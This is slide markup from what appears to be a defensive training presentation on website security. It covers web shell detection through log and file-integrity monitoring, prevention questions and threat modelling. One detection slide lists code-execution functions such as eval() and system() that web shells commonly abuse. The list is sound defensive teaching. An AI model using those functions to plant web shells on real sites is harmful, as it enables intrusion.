          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>CISO education and communications</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Threat modelling in 3 easy steps</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Focus: web shells</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Security and threat mitigation</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Incident response</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Resources</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>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What you can do about web shells (2 of 2)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;169;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Detect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Monitor access logs</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Monitor site file integrity</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Search site files for </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Commonly abused commands - eval(), system(), others</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-355600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Very long strings</a:t>
            </a:r>
            <a:endParaRPr>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0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426700" y="1520800"/>
            <a:ext cx="8395800" cy="1192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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans"/>
                <a:ea typeface="Encode Sans"/>
                <a:cs typeface="Encode Sans"/>
                <a:sym typeface="Encode Sans"/>
              </a:rPr>
              <a:t>What can you do to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans"/>
                <a:ea typeface="Encode Sans"/>
                <a:cs typeface="Encode Sans"/>
                <a:sym typeface="Encode Sans"/>
              </a:rPr>
              <a:t>reduce the likelihood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans"/>
                <a:ea typeface="Encode Sans"/>
                <a:cs typeface="Encode Sans"/>
                <a:sym typeface="Encode Sans"/>
              </a:rPr>
              <a:t> of things going wrong?</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Encode Sans"/>
              <a:ea typeface="Encode Sans"/>
              <a:cs typeface="Encode Sans"/>
              <a:sym typeface="Encode Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="175" name="Google Shape;175;p30">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528325" y="2750100"/>
            <a:ext cx="1714500" cy="857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Prevention</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1109101"/>
            <a:ext cx="8520600" cy="3675300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Begin developing a security mindset</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Understand the data/information to which your site provides access, as well as its relative sensitivity (or, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" i="1">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>desirability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Remind yourself (and stakeholders): security resides on a continuum, rather than a binary</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Imbue security awareness into the entire development/production process, not just the end</a:t>
            </a:r>
            <a:endParaRPr sz="2200">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1">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18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1">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18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1">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18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1">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18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Prevention: useful questions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Google Shape;187;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-374650" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>If I were a hacker, how could I break this (component, page, API, etc.)?</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-374650" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>What happens if I input the wrong type of information into this form field?</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-374650" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>If the database(s) accessed by this site were made public, what consequences are likely?</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-374650" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>What does this plugin do? Is it (still) needed?</a:t>
            </a:r>
            <a:endParaRPr sz="2300">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7">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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7">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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7">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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7">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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Prevention: more useful questions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;p33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-374650" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Does any element of my site rely on a user following expectations or unenforced rules?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2300" i="1">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Example: “Please upload pdf files only”</a:t>
            </a:r>
            <a:endParaRPr sz="2300" i="1">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-374650" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>When something does go wrong, does my site provide (leak) information to a user?</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-374650" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
